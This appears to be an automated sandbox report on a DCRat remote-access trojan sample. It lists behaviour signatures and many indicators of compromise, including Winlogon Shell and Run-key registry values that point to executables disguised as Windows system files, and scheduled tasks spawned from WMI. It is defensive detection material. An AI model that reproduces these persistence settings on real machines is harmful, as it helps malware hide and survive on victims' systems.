Analysis Overview
SHA256
0de2359b17f08c6bb6c9dd20d2e61700013fa90bc63b813d5607ac6542cd0143
Threat Level: Known bad
The file 0de2359b17f08c6bb6c9dd20d2e61700013fa90bc63b813d5607ac6542cd0143 was found to be: Known bad.
Malicious Activity Summary
DcRat
DCRat payload
Modifies WinLogon for persistence
Dcrat family
Process spawned unexpected child process
DCRat payload
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Checks computer location settings
Adds Run key to start application
Drops file in Windows directory
Drops file in Program Files directory
Unsigned PE
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Creates scheduled task(s)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-01 02:49
Signatures
DCRat payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Dcrat family
Unsigned PE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-01 02:49
Reported
2024-06-01 02:51
Platform
win7-20240508-en
Max time kernel
122s
Max time network
124s
Command Line
Signatures
DcRat
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Users\\Public\\Videos\\Sample Videos\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\lsass.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\winlogon.exe\", \"C:\\Program Files\\Internet Explorer\\en-US\\csrss.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\Idle.exe\", \"C:\\Users\\Public\\Music\\Sample Music\\services.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Users\\Public\\Videos\\Sample Videos\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\lsass.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\winlogon.exe\", \"C:\\Program Files\\Internet Explorer\\en-US\\csrss.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\Idle.exe\", \"C:\\Users\\Public\\Music\\Sample Music\\services.exe\", \"C:\\MSOCache\\All Users\\sppsvc.exe\", \"C:\\Users\\All Users\\Adobe\\Acrobat\\9.0\\smss.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\Idle.exe\", \"C:\\Windows\\AppPatch\\AppPatch64\\dllhost.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Users\\Public\\Videos\\Sample Videos\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\lsass.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\winlogon.exe\", \"C:\\Program Files\\Internet Explorer\\en-US\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Users\\Public\\Videos\\Sample Videos\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\lsass.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\winlogon.exe\", \"C:\\Program Files\\Internet Explorer\\en-US\\csrss.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\Idle.exe\", \"C:\\Users\\Public\\Music\\Sample Music\\services.exe\", \"C:\\MSOCache\\All Users\\sppsvc.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Users\\Public\\Videos\\Sample Videos\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\lsass.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\winlogon.exe\", \"C:\\Program Files\\Internet Explorer\\en-US\\csrss.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\Idle.exe\", \"C:\\Users\\Public\\Music\\Sample Music\\services.exe\", \"C:\\MSOCache\\All Users\\sppsvc.exe\", \"C:\\Users\\All Users\\Adobe\\Acrobat\\9.0\\smss.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Users\\Public\\Videos\\Sample Videos\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\lsass.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Users\\Public\\Videos\\Sample Videos\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Users\\Public\\Videos\\Sample Videos\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\lsass.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\winlogon.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Users\\Public\\Videos\\Sample Videos\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\lsass.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\winlogon.exe\", \"C:\\Program Files\\Internet Explorer\\en-US\\csrss.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\Idle.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Users\\Public\\Videos\\Sample Videos\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\lsass.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\winlogon.exe\", \"C:\\Program Files\\Internet Explorer\\en-US\\csrss.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\Idle.exe\", \"C:\\Users\\Public\\Music\\Sample Music\\services.exe\", \"C:\\MSOCache\\All Users\\sppsvc.exe\", \"C:\\Users\\All Users\\Adobe\\Acrobat\\9.0\\smss.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\Idle.exe\", \"C:\\Windows\\AppPatch\\AppPatch64\\dllhost.exe\", \"C:\\Windows\\TAPI\\dwm.exe\", \"C:\\Windows\\Setup\\State\\winlogon.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\smss.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Users\\Public\\Videos\\Sample Videos\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\lsass.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\winlogon.exe\", \"C:\\Program Files\\Internet Explorer\\en-US\\csrss.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\Idle.exe\", \"C:\\Users\\Public\\Music\\Sample Music\\services.exe\", \"C:\\MSOCache\\All Users\\sppsvc.exe\", \"C:\\Users\\All Users\\Adobe\\Acrobat\\9.0\\smss.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\Idle.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Users\\Public\\Videos\\Sample Videos\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\lsass.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\winlogon.exe\", \"C:\\Program Files\\Internet Explorer\\en-US\\csrss.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\Idle.exe\", \"C:\\Users\\Public\\Music\\Sample Music\\services.exe\", \"C:\\MSOCache\\All Users\\sppsvc.exe\", \"C:\\Users\\All Users\\Adobe\\Acrobat\\9.0\\smss.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\Idle.exe\", \"C:\\Windows\\AppPatch\\AppPatch64\\dllhost.exe\", \"C:\\Windows\\TAPI\\dwm.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\System.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
Process spawned unexpected child process
| Description | Indicator | Process | Target |
|---|---|---|---|
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
DCRat payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\Idle.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Users\\Public\\Music\\Sample Music\\services.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Windows\\AppPatch\\AppPatch64\\dllhost.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Windows\\TAPI\\dwm.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400 = "\"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\System.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\Idle.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Windows\\Setup\\State\\winlogon.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\lsass.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Users\\All Users\\Adobe\\Acrobat\\9.0\\smss.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Windows\\TAPI\\dwm.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\winlogon.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Program Files\\Internet Explorer\\en-US\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\MSOCache\\All Users\\sppsvc.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\lsass.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Windows\\AppPatch\\AppPatch64\\dllhost.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400 = "\"C:\\Users\\Public\\Videos\\Sample Videos\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\winlogon.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
